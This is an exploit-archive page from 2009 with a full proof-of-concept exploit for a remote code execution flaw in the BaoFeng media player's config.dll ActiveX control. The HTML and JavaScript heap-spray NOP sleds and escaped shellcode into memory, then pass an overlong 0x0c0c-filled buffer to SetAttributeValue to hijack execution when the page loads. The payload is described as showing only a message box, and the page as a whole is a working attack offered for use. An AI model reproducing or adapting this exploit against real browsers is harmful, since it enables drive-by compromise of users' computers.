[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : BaoFeng (config.dll) ActiveX Remote Code Execution Exploit
# Published : 2009-05-21
# Author : etirah
# Previous Title : Femitter FTP Server 1.x Multiple Vulnerabilities (post auth)
# Next Title : ChinaGames (CGAgent.dll) ActiveX Remote Code Execution Exploit
#
# BaoFeng (config.dll) ActiveX Remote Code Execution Exploit
# Exploit made by etirah
# Download: www.baofeng.com
#
# Problem DLL : config.dll
# Problem Func : SetAttributeValue(param1,param2,param3)
# Problem Param : param1
#
# References:
# 1. http://forum.eviloctal.com/viewthread.php?tid=35051
# 2. http://www.milw0rm.com/exploits/8579
<html>
<body>
<object classid="clsid:BD103B2B-30FB-4F1E-8C17-D8F6AADBCC05" id="target"></object>
<script>
function test()
{
//show messagebox
var shellcode = unescape("u68fcu0a6au1e38u6368ud189u684fu7432u0c91uf48bu7e8du33f4ub7dbu2b04u66e3u33bbu5332u7568u6573u5472ud233u8b64u305au4b8bu8b0cu1c49u098bu698buad08u6a3du380au751eu9505u57ffu95f8u8b60u3c45u4c8bu7805ucd03u598bu0320u33ddu47ffu348bu03bbu99f5ube0fu3a06u74c4uc108u07caud003ueb46u3bf1u2454u751cu8be4u2459udd03u8b66u7b3cu598bu031cu03ddubb2cu5f95u57abu3d61u0a6au1e38ua975udb33u6853u6574u7473uc48bu6853u3a20u292du7468u2065u6820u6168u6972ud48bu5053u5352u57ffu53fcu57ffu00f8");
var bigblock = unescape("%u9090%u9090");
var headersize = 20;
var slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace)
bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000)
block = block+block+fillblock;
memory = new Array();
for (x=0; x<300; x++)
memory[x] = block + shellcode;
var buffer = '';
while (buffer.length < 264)
buffer+=unescape("%u0c0c%u0c0c");
target.SetAttributeValue(buffer, ":-)", "(-:");
}
test();
</script>
</body>
</html>
# www.Syue.com [2009-05-21]